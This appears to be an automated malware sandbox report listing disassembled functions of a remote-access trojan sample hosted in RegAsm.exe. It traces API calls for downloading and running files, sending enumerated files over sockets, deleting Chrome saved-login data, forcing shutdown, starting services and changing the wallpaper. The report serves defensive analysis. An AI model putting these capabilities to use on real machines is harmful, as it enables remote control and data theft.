                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 314583886-0
                                                                • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                • API String ID: 1589313981-2876530381
                                                                • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                                Strings
                                                                • UserProfile, xrefs: 0040BA59
                                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                • API String ID: 2018770650-1062637481
                                                                • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                • GetLastError.KERNEL32 ref: 004179D8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeShutdownPrivilege
                                                                • API String ID: 3534403312-3733053543
                                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00409293
                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,013E6988,00000010), ref: 004048E0
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                • String ID:
                                                                • API String ID: 1824512719-0
                                                                • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                • String ID:
                                                                • API String ID: 276877138-0
                                                                • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP
                                                                • API String ID: 2299586839-711371036
                                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Resource$FindLoadLockSizeof
                                                                • String ID: SETTINGS
                                                                • API String ID: 3473537107-594951305
                                                                • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                • String ID:
                                                                • API String ID: 1157919129-0
                                                                • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                • String ID:
                                                                • API String ID: 1771804793-0
                                                                • Opcode ID: 99a3056b48020488f4a7cc8d14455ae8aa2eebd7be9758c69deaf4fbc99c6cac
                                                                • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                • Opcode Fuzzy Hash: 99a3056b48020488f4a7cc8d14455ae8aa2eebd7be9758c69deaf4fbc99c6cac
                                                                • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DownloadExecuteFileShell
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                • API String ID: 2825088817-3056885514
                                                                • Opcode ID: 37cd12fcc7ef71c22cc9d869740aa10db7399bf8fc5aa589d703b0ccccefadff
                                                                • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                • Opcode Fuzzy Hash: 37cd12fcc7ef71c22cc9d869740aa10db7399bf8fc5aa589d703b0ccccefadff
                                                                • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFind$FirstNextsend
                                                                • String ID: XPG$XPG
                                                                • API String ID: 4113138495-1962359302
                                                                • Opcode ID: fd6193630a935a9c0783525d90d8abb728b5b23f535aeb2500ec47bbe22b8f4c
                                                                • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                • Opcode Fuzzy Hash: fd6193630a935a9c0783525d90d8abb728b5b23f535aeb2500ec47bbe22b8f4c
                                                                • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137E1
                                                                  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                • API String ID: 4127273184-3576401099
                                                                • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                Function 00451D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                                • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                • String ID:
                                                                • API String ID: 4212172061-0
                                                                • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID: p'E$JD
                                                                • API String ID: 1084509184-908320845
                                                                • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                • String ID:
                                                                • API String ID: 2829624132-0
                                                                • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                Memory Dump Source
